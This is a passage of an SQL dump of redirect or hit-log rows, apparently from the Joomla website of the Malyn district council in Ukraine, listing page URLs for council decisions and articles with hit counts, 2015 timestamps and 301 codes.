00:00:00',301),(16973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=702:--------------------2011-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2015-11-03 05:36:04','0000-00-00 00:00:00',301),(16974,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56&layout=blog&Itemid=97&lang=en&limitstart=5','','','',1,0,'2015-11-03 06:23:59','0000-00-00 00:00:00',301),(16975,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=en&limitstart=5','','','',1,0,'2015-11-03 06:24:00','0000-00-00 00:00:00',301),(16976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2015-11-03 07:53:44','0000-00-00 00:00:00',301),(16977,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=uk','','','',3,0,'2015-11-03 08:02:24','0000-00-00 00:00:00',301),(16978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=318:-2007-2011&catid=33&Itemid=66&lang=uk','','','',4,0,'2015-11-03 08:14:18','0000-00-00 00:00:00',301),(16979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=514:2011-12-22-10-03-07&catid=38:--19122011-&Itemid=73&lang=ru','','','',6,0,'2015-11-03 08:18:31','0000-00-00 00:00:00',301),(16980,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=uk','','','',3,0,'2015-11-03 10:17:26','0000-00-00 00:00:00',301),(16981,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=940:2013-02-21-14-02-14&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-03 10:31:27','0000-00-00 00:00:00',301),(16982,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=346:2011-06-15-12-31-02&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-03 10:31:29','0000-00-00 00:00:00',301),(16983,'http://www.malyn-rayrada.org.ua/index.php?Itemid=69&catid=35:2011-06-30-10-56-57&id=359:2011-06-30-11-10-42&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-03 11:24:03','0000-00-00 00:00:00',301),(16984,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1089-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',3,0,'2015-11-03 11:50:07','0000-00-00 00:00:00',301),(16985,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1090-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',4,0,'2015-11-03 11:50:09','0000-00-00 00:00:00',301),(16986,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1093-pro-perspektivi-aministrativno-teritorialnoji-reformi-vidpovidno-do-zakonu-ukrajini-pro-dobrovilne-ob-ednannya-teritorialnikh-gromad','','','',5,0,'2015-11-03 11:50:11','0000-00-00 00:00:00',301),(16987,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1093-pro-perspektivi-aministrativno-teritorialnoji-reformi-vidpovidno-do-zakonu-ukrajini-pro-dobrovilne-ob-ednannya-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-03 11:50:12','0000-00-00 00:00:00',301),(16988,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1095-pro-zatverdzhennya-rezultativ-auktsionnikh-torgiv-z-prodazhu-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',1,0,'2015-11-03 11:50:14','0000-00-00 00:00:00',301),(16989,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1095-pro-zatverdzhennya-rezultativ-auktsionnikh-torgiv-z-prodazhu-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-03 11:50:16','0000-00-00 00:00:00',301),(16990,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1096-pro-peredachu-primishchennya-gorinskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-gorinskoji-silskoji-radi','','','',3,0,'2015-11-03 11:50:17','0000-00-00 00:00:00',301),(16991,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1096-pro-peredachu-primishchennya-gorinskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-gorinskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-03 11:50:19','0000-00-00 00:00:00',301),(16992,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1097-pro-khid-vikonannya-rajonnoji-programi-rozvitku-agropromislovogo-kompleksu-malinskogo-rajonu-na-2011-2015-roki-ta-pidsumki-vesnyano-polovikh-robit','','','',4,0,'2015-11-03 11:50:20','0000-00-00 00:00:00',301),(16993,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1098-pro-zvernennya-do-derzhavnoji-finansovoji-inspektsiji-v-zhitomirskij-oblasti-shchodo-vklyuchennya-malinskogo-rajonu-v-plan-kompleksnikh-perevirok-na-2015-rik','','','',1,0,'2015-11-03 11:50:21','0000-00-00 00:00:00',301),(16994,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/696-pro-zatverdzhennja-ugodi-pro-spilne-finansuvannja','','','',4,0,'2015-11-03 11:50:23','0000-00-00 00:00:00',301),(16995,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/472-pro-zatverdzhennja-programi-zajnjatosti-naselennja_2','','','',2,0,'2015-11-03 11:50:24','0000-00-00 00:00:00',301),(16996,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/359-pro-hid-vikonannja-rajonnoi-programi-provedennja-u','','','',2,0,'2015-11-03 11:50:32','0000-00-00 00:00:00',301),(16997,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/395-pro-zvernennja-do-nachalnika-sluzhbi-avtomobilnih','','','',2,0,'2015-11-03 11:50:34','0000-00-00 00:00:00',301),(16998,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/769-pro-zatverdzhennja-rozporjadzhennja-golovi_3','','','',9,0,'2015-11-03 11:50:45','0000-00-00 00:00:00',301),(16999,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/769-pro-zatverdzhennja-rozporjadzhennja-golovi_3?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:50:46','0000-00-00 00:00:00',301),(17000,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/770-pro-zatverdzhennja-programi-ohoroni-ta','','','',9,0,'2015-11-03 11:50:48','0000-00-00 00:00:00',301),(17001,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/770-pro-zatverdzhennja-programi-ohoroni-ta?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:50:49','0000-00-00 00:00:00',301),(17002,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/773-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014','','','',8,0,'2015-11-03 11:50:51','0000-00-00 00:00:00',301),(17003,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/773-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:50:52','0000-00-00 00:00:00',301),(17004,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/774-pro-nadannja-prava-malinskij-rajonnij-radi_2','','','',9,0,'2015-11-03 11:50:54','0000-00-00 00:00:00',301),(17005,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/774-pro-nadannja-prava-malinskij-rajonnij-radi_2?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:50:55','0000-00-00 00:00:00',301),(17006,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/315-pro-vnesennja-zmin-do-programi-vidpochinku-ta?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:51:01','0000-00-00 00:00:00',301),(17007,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/316-pro-zatverdzhennja-rajonnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 11:51:04','0000-00-00 00:00:00',301),(17008,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/317-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_3','','','',8,0,'2015-11-03 11:51:06','0000-00-00 00:00:00',301),(17009,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/317-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_3?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-03 11:51:07','0000-00-00 00:00:00',301),(17010,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/318-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_4','','','',8,0,'2015-11-03 11:51:09','0000-00-00 00:00:00',301),(17011,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/318-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_4?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:51:11','0000-00-00 00:00:00',301),(17012,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/320-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_4','','','',8,0,'2015-11-03 11:51:12','0000-00-00 00:00:00',301),(17013,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/320-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_4?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:51:15','0000-00-00 00:00:00',301),(17014,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/321-pro-stan-vikonannja-dohidnoi-chastini-rajonnogo','','','',8,0,'2015-11-03 11:51:16','0000-00-00 00:00:00',301),(17015,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/321-pro-stan-vikonannja-dohidnoi-chastini-rajonnogo?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:51:18','0000-00-00 00:00:00',301),(17016,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16082013-/585-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu','','','',8,0,'2015-11-03 11:51:21','0000-00-00 00:00:00',301),(17017,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/243-pro-pogodzhennja-vvedennja-shtatnoi-odinici?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:51:24','0000-00-00 00:00:00',301),(17018,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/33-pro-nadannja-dozvolu-teritorialnomu-centru','','','',9,0,'2015-11-03 11:51:26','0000-00-00 00:00:00',301),(17019,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/802-pro-peredachu-avtomobilja-gaz-3110_2','','','',2,0,'2015-11-03 11:51:27','0000-00-00 00:00:00',301),(17020,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/155-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_3','','','',5,0,'2015-11-03 11:51:38','0000-00-00 00:00:00',301),(17021,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/24-pro-zatverdzhennja-programi-reformuvannja-i','','','',5,0,'2015-11-03 11:51:40','0000-00-00 00:00:00',301),(17022,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/36-pro-klopotannja-shhodo-pripinennja-prava','','','',5,0,'2015-11-03 11:51:45','0000-00-00 00:00:00',301),(17023,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/50-pro-peredachu-knigi','','','',5,0,'2015-11-03 11:51:46','0000-00-00 00:00:00',301),(17024,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/51-pro-pogodzhennja-klopotannja-shhodo-otrimannja','','','',5,0,'2015-11-03 11:51:48','0000-00-00 00:00:00',301),(17025,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku','','','',14,0,'2015-11-03 11:51:48','0000-00-00 00:00:00',301),(17026,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/53-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_2','','','',6,0,'2015-11-03 11:51:49','0000-00-00 00:00:00',301),(17027,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/91-pro-zatverdzhennja-polozhennja-pro-pochesnu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-03 11:51:52','0000-00-00 00:00:00',301),(17028,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/120-pro-nadannja-zgodi-na-ctvorennja-malinskogo','','','',7,0,'2015-11-03 11:51:56','0000-00-00 00:00:00',301),(17029,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/120-pro-nadannja-zgodi-na-ctvorennja-malinskogo?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:51:58','0000-00-00 00:00:00',301),(17030,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/147-pro-zvernennja-do-prezidenta-ukraini-shhodo','','','',7,0,'2015-11-03 11:51:59','0000-00-00 00:00:00',301),(17031,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/147-pro-zvernennja-do-prezidenta-ukraini-shhodo?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-03 11:52:01','0000-00-00 00:00:00',301),(17032,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/148-pro-priznachennja-kerivnika-komunalnogo','','','',7,0,'2015-11-03 11:52:02','0000-00-00 00:00:00',301),(17033,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/328-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 11:52:07','0000-00-00 00:00:00',301),(17034,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/345-pro-zatverdzhennja-porjadku-pogodzhennja','','','',1,0,'2015-11-03 11:52:14','0000-00-00 00:00:00',301),(17035,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/345-pro-zatverdzhennja-porjadku-pogodzhennja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-03 11:52:16','0000-00-00 00:00:00',301),(17036,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/634-pro-pogodzhennja-peredachi-v-orendu-primishhen-pid','','','',3,0,'2015-11-03 11:52:26','0000-00-00 00:00:00',301),(17037,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/635-pro-nadannja-dozvolu-na-vlashtuvannja-rozgon-v-f','','','',6,0,'2015-11-03 11:52:27','0000-00-00 00:00:00',301),(17038,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/636-pro-stan-zlochinnosti-na-teritorii-malinskogo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-03 11:52:29','0000-00-00 00:00:00',301),(17039,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/639-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_3','','','',4,0,'2015-11-03 11:52:31','0000-00-00 00:00:00',301),(17040,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/689-pro-zatverdzhennja-pereliku-zakladiv-kulturi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-03 11:52:35','0000-00-00 00:00:00',301),(17041,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/690-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_24?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-03 11:52:36','0000-00-00 00:00:00',301),(17042,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/785-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-03 11:52:45','0000-00-00 00:00:00',301),(17043,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/789-pro-peredachu-budivli-lokomotivnogo-depo-na-balans_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-03 11:52:47','0000-00-00 00:00:00',301),(17044,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/72-pro-rajonnij-bjudzhet-na-2011-rik','','','',9,0,'2015-11-03 11:52:50','0000-00-00 00:00:00',301),(17045,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/178-pro-spisannja-osnovnih-zasobiv','','','',4,0,'2015-11-03 11:52:51','0000-00-00 00:00:00',301),(17046,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/179-pro-nadannja-zgodi-na-peredachu-traktora?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 11:52:54','0000-00-00 00:00:00',301),(17047,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/441-pro-zatverdzhennja-rozmiru-vartosti-produktiv_3','','','',2,0,'2015-11-03 11:53:02','0000-00-00 00:00:00',301),(17048,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/492-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-03 11:53:11','0000-00-00 00:00:00',301),(17049,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1205-pro-zvernennya-do-kerivnitstva-dp-propan-shchodo-zabezpechennya-zhiteliv-rajonu-skraplenim-gazom?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-03 11:53:29','0000-00-00 00:00:00',301),(17050,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1022-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',9,0,'2015-11-03 11:53:31','0000-00-00 00:00:00',301),(17051,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku?limitstart=0','','','',4,0,'2015-11-03 11:53:32','0000-00-00 00:00:00',301),(17052,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1171-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',3,0,'2015-11-03 11:53:34','0000-00-00 00:00:00',301),(17053,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13&Itemid=33&lang=en','','','',1,0,'2015-11-03 11:53:36','0000-00-00 00:00:00',301),(17054,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13&Itemid=33&lang=ru','','','',1,0,'2015-11-03 11:53:37','0000-00-00 00:00:00',301),(17055,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13&Itemid=33&lang=uk','','','',14,0,'2015-11-03 11:53:39','0000-00-00 00:00:00',301),(17056,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13:2010-06-06-03-57-58&Itemid=33&lang=en','','','',1,0,'2015-11-03 11:53:40','0000-00-00 00:00:00',301),(17057,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13:2010-06-06-03-57-58&Itemid=33&lang=ru','','','',1,0,'2015-11-03 11:53:42','0000-00-00 00:00:00',301),(17058,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13:2010-06-06-03-57-58&Itemid=33&lang=uk','','','',3,0,'2015-11-03 11:53:43','0000-00-00 00:00:00',301),(17059,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27&Itemid=58&lang=en','','','',1,0,'2015-11-03 11:53:45','0000-00-00 00:00:00',301),(17060,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27&Itemid=58&lang=ru','','','',1,0,'2015-11-03 11:53:47','0000-00-00 00:00:00',301),(17061,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27&Itemid=58&lang=uk','','','',1,0,'2015-11-03 11:53:49','0000-00-00 00:00:00',301),(17062,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5&Itemid=6&lang=en','','','',1,0,'2015-11-03 11:53:54','0000-00-00 00:00:00',301),(17063,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5&Itemid=6&lang=ru','','','',1,0,'2015-11-03 11:53:55','0000-00-00 00:00:00',301),(17064,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5&Itemid=6&lang=uk','','','',1,0,'2015-11-03 11:53:57','0000-00-00 00:00:00',301),(17065,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=en','','','',1,0,'2015-11-03 11:53:58','0000-00-00 00:00:00',301),(17066,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=ru','','','',1,0,'2015-11-03 11:54:00','0000-00-00 00:00:00',301),(17067,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=uk','','','',1,0,'2015-11-03 11:54:01','0000-00-00 00:00:00',301),(17068,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=188:2010-12-15-13-18-12&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:04','0000-00-00 00:00:00',301),(17069,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=189:2010-12-15-13-21-57&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:06','0000-00-00 00:00:00',301),(17070,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=190:2010-12-15-13-24-17&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:09','0000-00-00 00:00:00',301),(17071,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=191:2010-12-15-13-27-06&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:11','0000-00-00 00:00:00',301),(17072,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=192:2010-12-15-13-29-12&catid=29&Itemid=60&lang=uk','','','',7,0,'2015-11-03 11:54:12','0000-00-00 00:00:00',301),(17073,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=193:------------2009-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:14','0000-00-00 00:00:00',301),(17074,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=194:-----------2008-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:15','0000-00-00 00:00:00',301),(17075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=195:------------2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:17','0000-00-00 00:00:00',301),(17076,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=196:---------------------2005-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:18','0000-00-00 00:00:00',301),(17077,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=197:-----l-r--2004-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:20','0000-00-00 00:00:00',301),(17078,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=201:--------l-r--2011--&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:31','0000-00-00 00:00:00',301),(17079,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=204:2010-12-15-14-13-07&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:36','0000-00-00 00:00:00',301),(17080,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=205:--------2011--&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:39','0000-00-00 00:00:00',301),(17081,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=206:2010-12-15-14-19-27&catid=29&Itemid=60&lang=uk','','','',3,0,'2015-11-03 11:54:40','0000-00-00 00:00:00',301),(17082,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=207:2010-12-15-14-22-39&catid=29&Itemid=60&lang=uk','','','',11,0,'2015-11-03 11:54:42','0000-00-00 00:00:00',301),(17083,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:44','0000-00-00 00:00:00',301),(17084,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-11-03 11:54:45','0000-00-00 00:00:00',301),(17085,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&catid=29:--15122010-&Itemid=60&lang=ru','','','',1,0,'2015-11-03 11:54:47','0000-00-00 00:00:00',301),(17086,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:48','0000-00-00 00:00:00',301),(17087,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:49','0000-00-00 00:00:00',301),(17088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-11-03 11:54:51','0000-00-00 00:00:00',301),(17089,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&catid=29:--15122010-&Itemid=60&lang=ru','','','',1,0,'2015-11-03 11:54:53','0000-00-00 00:00:00',301),(17090,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:54:56','0000-00-00 00:00:00',301),(17091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=210:-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:55:13','0000-00-00 00:00:00',301),(17092,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=210:-2010-&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-11-03 11:55:15','0000-00-00 00:00:00',301),(17093,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=210:-2010-&catid=29:--15122010-&Itemid=60&lang=ru','','','',1,0,'2015-11-03 11:55:16','0000-00-00 00:00:00',301),(17094,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=210:-2010-&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2015-11-03 11:55:18','0000-00-00 00:00:00',301),(17095,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=229:-2011-&catid=30:--30122010-&Itemid=61&lang=en','','','',1,0,'2015-11-03 11:55:49','0000-00-00 00:00:00',301),(17096,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=229:-2011-&catid=30:--30122010-&Itemid=61&lang=ru','','','',1,0,'2015-11-03 11:55:51','0000-00-00 00:00:00',301),(17097,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=229:-2011-&catid=30:--30122010-&Itemid=61&lang=uk','','','',1,0,'2015-11-03 11:55:52','0000-00-00 00:00:00',301),(17098,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=230:---3----6--30--2010-&catid=30:--30122010-&Itemid=61&lang=en','','','',1,0,'2015-11-03 11:55:54','0000-00-00 00:00:00',301),(17099,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=230:---3----6--30--2010-&catid=30:--30122010-&Itemid=61&lang=ru','','','',1,0,'2015-11-03 11:55:55','0000-00-00 00:00:00',301),(17100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=230:---3----6--30--2010-&catid=30:--30122010-&Itemid=61&lang=uk','','','',9,0,'2015-11-03 11:55:57','0000-00-00 